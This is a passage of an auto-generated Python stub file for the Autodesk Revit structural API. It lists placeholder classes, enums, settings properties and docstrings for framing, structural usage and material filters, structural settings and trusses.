element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete. """ pass @staticmethod def GetEndReference(familyInstance, end): """ GetEndReference(familyInstance: FamilyInstance, end: int) -> Reference Returns a reference to the end of a framing element according to the setback settings. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined. end: The index of the end (0 for the start, 1 for the end). Returns: The end reference. """ pass @staticmethod def IsEndReferenceValid(familyInstance, end, pick): """ IsEndReferenceValid(familyInstance: FamilyInstance, end: int, pick: Reference) -> bool Determines if the given reference can be set for the given end of the framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined at the given end. end: The index of the end (0 for the start, 1 for the end). pick: The reference to be checked against the given end of the framing element. Returns: True if the given reference can be set for the given end of the framing element. """ pass @staticmethod def IsJoinAllowedAtEnd(familyInstance, end): """ IsJoinAllowedAtEnd(familyInstance: FamilyInstance, end: int) -> bool Identifies if the indicated end of the framing element is allowed to join to others. familyInstance: The FamilyInstance, which must be of a structural framing category. end: The index of the end (0 for the start, 1 for the end). Returns: True if it is allowed to join. False if it is disallowed. """ pass @staticmethod def RemoveEndReference(familyInstance, end): """ RemoveEndReference(familyInstance: FamilyInstance, end: int) Resets the end reference of the structural framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined. end: The index of the end (0 for the start, 1 for the end). """ pass @staticmethod def SetEndReference(familyInstance, end, pick): """ SetEndReference(familyInstance: FamilyInstance, end: int, pick: Reference) Sets the end reference of a framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined. end: The index of the end (0 for the start, 1 for the end). pick: The reference to set to the given end. """ pass __all__ = [ 'AllowJoinAtEnd', 'CanFlipEnds', 'CanSetEndReference', 'DisallowJoinAtEnd', 'FlipEnds', 'GetEndReference', 'IsEndReferenceValid', 'IsJoinAllowedAtEnd', 'RemoveEndReference', 'SetEndReference', ] class StructuralInstanceUsage(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural usage of a family instance. enum StructuralInstanceUsage, values: Automatic (10), Brace (7), Column (2), Girder (3), HorizontalBracing (8), Joist (4), KickerBracing (9), Other (6), Purlin (5), TrussChord (11), TrussWeb (12), Undefined (0), Wall (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Automatic = None Brace = None Column = None Girder = None HorizontalBracing = None Joist = None KickerBracing = None Other = None Purlin = None TrussChord = None TrussWeb = None Undefined = None value__ = None Wall = None class StructuralInstanceUsageFilter(ElementSlowFilter, IDisposable): """ A filter used to find elements that are structural family instances (typically columns, beams or braces) of the given structural usage. StructuralInstanceUsageFilter(structuralUsage: StructuralInstanceUsage, inverted: bool) StructuralInstanceUsageFilter(structuralUsage: StructuralInstanceUsage) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralUsage, inverted=None): """ __new__(cls: type, structuralUsage: StructuralInstanceUsage, inverted: bool) __new__(cls: type, structuralUsage: StructuralInstanceUsage) """ pass StructuralUsage = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The family instance structural usage. Get: StructuralUsage(self: StructuralInstanceUsageFilter) -> StructuralInstanceUsage """ class StructuralMaterialType(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural material type. This enum value is returned by Autodesk::Revit::DB::FamilyInstance::StructuralMaterialType. enum StructuralMaterialType, values: Aluminum (7), Concrete (2), Generic (6), Other (4), PrecastConcrete (5), Steel (1), Undefined (0), Wood (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Aluminum = None Concrete = None Generic = None Other = None PrecastConcrete = None Steel = None Undefined = None value__ = None Wood = None class StructuralMaterialTypeFilter(ElementSlowFilter, IDisposable): """ A filter used to match family instances that have the given structural material type. StructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType, inverted: bool) StructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralMaterialType, inverted=None): """ __new__(cls: type, structuralMaterialType: StructuralMaterialType, inverted: bool) __new__(cls: type, structuralMaterialType: StructuralMaterialType) """ pass StructuralMaterialType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The structural material type. Get: StructuralMaterialType(self: StructuralMaterialTypeFilter) -> StructuralMaterialType """ class StructuralSectionsServiceData(object, IDisposable): """ The data needed by section type server to perform type definition. StructuralSectionsServiceData(document: Document, currentElementIds: IList[ElementId]) """ def Dispose(self): """ Dispose(self: StructuralSectionsServiceData) """ pass def GetCurrentElements(self): """ GetCurrentElements(self: StructuralSectionsServiceData) -> IList[ElementId] Returns the list of Ids of the current elements. Returns: Ids of the current elements. Contains the family base element to which the section shape type parameter belongs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: StructuralSectionsServiceData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, document, currentElementIds): """ __new__(cls: type, document: Document, currentElementIds: IList[ElementId]) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Document = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The current document. Get: Document(self: StructuralSectionsServiceData) -> Document """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: StructuralSectionsServiceData) -> bool """ class StructuralSettings(Element, IDisposable): """ Provides access to project-wide structural settings. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetStructuralSettings(doc): """ GetStructuralSettings(doc: Document) -> StructuralSettings Obtains the StructuralSettings object for the specified project document. doc: A project document. Returns: The StructuralSettings object. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AnalyticalLinkAutofixTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for the analytical link distance. Get: AnalyticalLinkAutofixTolerance(self: StructuralSettings) -> float Set: AnalyticalLinkAutofixTolerance(self: StructuralSettings) = value """ AnalyticalModelAutoCheckConsistency = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check automatically for consistency between the analytical and physical models. Get: AnalyticalModelAutoCheckConsistency(self: StructuralSettings) -> bool Set: AnalyticalModelAutoCheckConsistency(self: StructuralSettings) = value """ AnalyticalModelAutoCheckMemberSupports = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check automatically for member supports. Get: AnalyticalModelAutoCheckMemberSupports(self: StructuralSettings) -> bool Set: AnalyticalModelAutoCheckMemberSupports(self: StructuralSettings) = value """ AnalyticalModelCheckAdjustment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for analytical model distance from default location is larger than the tolerance defined by the property AnalyticalModelAdjustmentTolerance. Get: AnalyticalModelCheckAdjustment(self: StructuralSettings) -> bool Set: AnalyticalModelCheckAdjustment(self: StructuralSettings) = value """ AnalyticalModelCheckBeamSlabDistance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check the analytical model distance between beam and slab for a level. Get: AnalyticalModelCheckBeamSlabDistance(self: StructuralSettings) -> bool Set: AnalyticalModelCheckBeamSlabDistance(self: StructuralSettings) = value """ AnalyticalModelCheckCircularReferences = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check member supports for circular references. Get: AnalyticalModelCheckCircularReferences(self: StructuralSettings) -> bool Set: AnalyticalModelCheckCircularReferences(self: StructuralSettings) = value """ AnalyticalModelCheckDiscrepancy = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for distance between analytical and physical models greater than a tolerance defined by AnalyticalModelDiscrepancyTolerance. Get: AnalyticalModelCheckDiscrepancy(self: StructuralSettings) -> bool Set: AnalyticalModelCheckDiscrepancy(self: StructuralSettings) = value """ AnalyticalModelCheckInstability = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for possible instability based on release conditions. Get: AnalyticalModelCheckInstability(self: StructuralSettings) -> bool Set: AnalyticalModelCheckInstability(self: StructuralSettings) = value """ AnalyticalModelCheckSupportDistance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Check that joins in the physical model are consistent with proximity in the analytical model. Get: AnalyticalModelCheckSupportDistance(self: StructuralSettings) -> bool Set: AnalyticalModelCheckSupportDistance(self: StructuralSettings) = value """ AnalyticalModelDiscrepancyTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for the analytical-to-physical model distance. Get: AnalyticalModelDiscrepancyTolerance(self: StructuralSettings) -> float Set: AnalyticalModelDiscrepancyTolerance(self: StructuralSettings) = value """ AnalyticalModelHorizontalAutofixTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for horizontal auto-detect for the analytical model. Get: AnalyticalModelHorizontalAutofixTolerance(self: StructuralSettings) -> float Set: AnalyticalModelHorizontalAutofixTolerance(self: StructuralSettings) = value """ AnalyticalModelSupportDistanceTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The maximum distance between two structural elements, where analytical model support rules still apply. Get: AnalyticalModelSupportDistanceTolerance(self: StructuralSettings) -> float Set: AnalyticalModelSupportDistanceTolerance(self: StructuralSettings) = value """ AnalyticalModelVerticalAutofixTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for vertical auto-detect for the analytical model. Get: AnalyticalModelVerticalAutofixTolerance(self: StructuralSettings) -> float Set: AnalyticalModelVerticalAutofixTolerance(self: StructuralSettings) = value """ BoundaryConditionAreaAndLineSymbolSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbol spacing for boundary conditions. Get: BoundaryConditionAreaAndLineSymbolSpacing(self: StructuralSettings) -> float Set: BoundaryConditionAreaAndLineSymbolSpacing(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolFixed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a fixed boundary condition. Get: BoundaryConditionFamilySymbolFixed(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolFixed(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolPinned = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a pinned boundary condition. Get: BoundaryConditionFamilySymbolPinned(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolPinned(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolRoller = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a roller boundary condition. Get: BoundaryConditionFamilySymbolRoller(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolRoller(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolUserDefined = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a user-defined boundary condition. Get: BoundaryConditionFamilySymbolUserDefined(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolUserDefined(self: StructuralSettings) = value """ BraceAboveSymbol = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the ElementType to represent a brace above a beam in plan view. Get: BraceAboveSymbol(self: StructuralSettings) -> ElementId Set: BraceAboveSymbol(self: StructuralSettings) = value """ BraceBelowSymbol = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the ElementType to represent a brace below a beam in plan view. Get: BraceBelowSymbol(self: StructuralSettings) -> ElementId Set: BraceBelowSymbol(self: StructuralSettings) = value """ BraceParallelLineOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance by which brace symbols in plan views will be offset. Get: BraceParallelLineOffset(self: StructuralSettings) -> float Set: BraceParallelLineOffset(self: StructuralSettings) = value """ CheckAnalyticalModelAsset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for valid Asset within the Material of associated Physical Element. Get: CheckAnalyticalModelAsset(self: StructuralSettings) -> bool Set: CheckAnalyticalModelAsset(self: StructuralSettings) = value """ DifferentiateAnalyticalEnds = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to use a subcategory for the ends of a linear analytical model, rather than the main category. Get: DifferentiateAnalyticalEnds(self: StructuralSettings) -> bool Set: DifferentiateAnalyticalEnds(self: StructuralSettings) = value """ KickerBraceSymbol = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the ElementType to represent a kicker brace. Get: KickerBraceSymbol(self: StructuralSettings) -> ElementId Set: KickerBraceSymbol(self: StructuralSettings) = value """ ShowBraceAbove = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to show brace symbols above beams in plan views. Get: ShowBraceAbove(self: StructuralSettings) -> bool Set: ShowBraceAbove(self: StructuralSettings) = value """ ShowBraceBelow = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to show brace symbols below beams in plan views. Get: ShowBraceBelow(self: StructuralSettings) -> bool Set: ShowBraceBelow(self: StructuralSettings) = value """ SymbolicCutbackForBeamAndTruss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbolic cutback distance to be applied to all beams and trusses. Get: SymbolicCutbackForBeamAndTruss(self: StructuralSettings) -> float Set: SymbolicCutbackForBeamAndTruss(self: StructuralSettings) = value """ SymbolicCutbackForBrace = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbolic cutback distance to be applied to all braces. Get: SymbolicCutbackForBrace(self: StructuralSettings) -> float Set: SymbolicCutbackForBrace(self: StructuralSettings) = value """ SymbolicCutbackForColumn = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbolic cutback distance to be applied to all columns. Get: SymbolicCutbackForColumn(self: StructuralSettings) -> float Set: SymbolicCutbackForColumn(self: StructuralSettings) = value """ class StructuralType(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural type of a family instance. enum StructuralType, values: Beam (1), Brace (2), Column (3), Footing (4), NonStructural (0), UnknownFraming (5) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Beam = None Brace = None Column = None Footing = None NonStructural = None UnknownFraming = None value__ = None class StructuralWallUsage(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural usage of a wall. enum StructuralWallUsage, values: Bearing (1), Combined (3), NonBearing (0), Shear (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bearing = None Combined = None NonBearing = None Shear = None value__ = None class StructuralWallUsageFilter(ElementSlowFilter, IDisposable): """ A filter used to match walls that have the given structural wall usage. StructuralWallUsageFilter(structuralWallUsage: StructuralWallUsage, inverted: bool) StructuralWallUsageFilter(structuralWallUsage: StructuralWallUsage) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralWallUsage, inverted=None): """ __new__(cls: type, structuralWallUsage: StructuralWallUsage, inverted: bool) __new__(cls: type, structuralWallUsage: StructuralWallUsage) """ pass StructuralWallUsage = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The wall structural usage. Get: StructuralWallUsage(self: StructuralWallUsageFilter) -> StructuralWallUsage """ class SurfaceElementExtension(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Extension. enum SurfaceElementExtension, values: BottomOrTop (0), Plane (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrTop = None Plane = None value__ = None class SurfaceElementProjectionZ(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection Z. enum SurfaceElementProjectionZ, values: BottomOrExterior (2), CenterOfCore (3), CenterOfElement (1), Plane (4), TopOrInterior (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrExterior = None CenterOfCore = None CenterOfElement = None Plane = None TopOrInterior = None value__ = None class TargetRebarConstraintType(Enum, IComparable, IFormattable, IConvertible): """ A type used to identify the particular part of a Stirrup style rebar to which a Standard style rebar's handle is constrained. enum TargetRebarConstraintType, values: BarBend (5), Edge (3), EndOfBar (2), HookBend (6), OutOfPlaneExtent (4), RebarPlane (0), StartOfBar (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BarBend = None Edge = None EndOfBar = None HookBend = None OutOfPlaneExtent = None RebarPlane = None StartOfBar = None value__ = None class TranslationRotationValue(Enum, IComparable, IFormattable, IConvertible): """ Specifies the type of condition applied to the translation or rotation parameter. enum TranslationRotationValue, values: Fixed (0), Release (1), Spring (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Fixed = None Release = None Spring = None value__ = None class Truss(Element, IDisposable): """ Represents all kinds of Trusses. """ def AttachChord(self, attachToElement, location, forceRemoveSketch): """ AttachChord(self: Truss, attachToElement: Element, location: TrussChordLocation, forceRemoveSketch: bool) Attach a truss's specific chord to a specified element, the element should be a roof or floor. attachToElement: The element to which the truss's chord will attach. The element should be a roof or floor. location: The chord need to be attached. forceRemoveSketch: Whether to detach the original sketch if there is one. """ pass @staticmethod def Create(document, trussTypeId, sketchPlaneId, curve): """ Create(document: Document, trussTypeId: ElementId, sketchPlaneId: ElementId, curve: Curve) -> Truss Creates a new Truss. document: The document in which the new Truss is created. trussTypeId: Element id of the truss type. sketchPlaneId: Element id of a SketchPlane. curve: The curve of the truss element. It must be a line, must not be a vertical line, and must be within the sketch plane. """ pass def DetachChord(self, location): """ DetachChord(self: Truss, location: TrussChordLocation) Detach a truss's specific chord from the element to which it is attached. location: The chord. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass @staticmethod def DropTruss(truss): """ DropTruss(truss: Truss) Drop truss Family, it will disassociate all members from the truss and delete the truss. truss: The truss to be dropped. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetTrussMemberInfo(self, elemId): """ GetTrussMemberInfo(self: Truss, elemId: ElementId) -> TrussMemberInfo Query if a given element is a member of a truss, its lock status and its usage, etc. elemId: The querying element. Returns: A struct TrussMemberInfo that contains the querying element's host truss, whether to lock to the truss, usage type, etc. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveProfile(self): """ RemoveProfile(self: Truss) Remove the profile of a truss. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetProfile(self, topChords, bottomChords): """ SetProfile(self: Truss, topChords: CurveArray, bottomChords: CurveArray) Add or modify the profile of a truss. topChords: The curves serving as top chords of the truss. bottomChords: The curves serving as bottom chords of the truss. """ pass def TogglePinMember(self, elemId): """ TogglePinMember(self: Truss, elemId: ElementId) Pin/Unpin a truss member. elemId: The member element is going to pin/unpin. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass Curves = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Get all the truss curves. Get: Curves(self: Truss) -> CurveArray """ Members = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Get all the members of truss. Get: Members(self: Truss) -> ICollection[ElementId] """ TrussType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieve/set an object that represents the type of the truss. Get: TrussType(self: Truss) -> TrussType Set: TrussType(self: Truss) = value """ class TrussChordLocation(Enum, IComparable, IFormattable, IConvertible): """ This enumerated type represents the options for the Truss Chord Location. enum TrussChordLocation, values: Bottom (0), Top (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None Top = None value__ = None class TrussCurveType(Enum, IComparable, IFormattable, IConvertible): """ Types of curves created in truss families. enum TrussCurveType, values: BottomChord (2), NonTrussCurve (0), TopChord (1), Web (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomChord 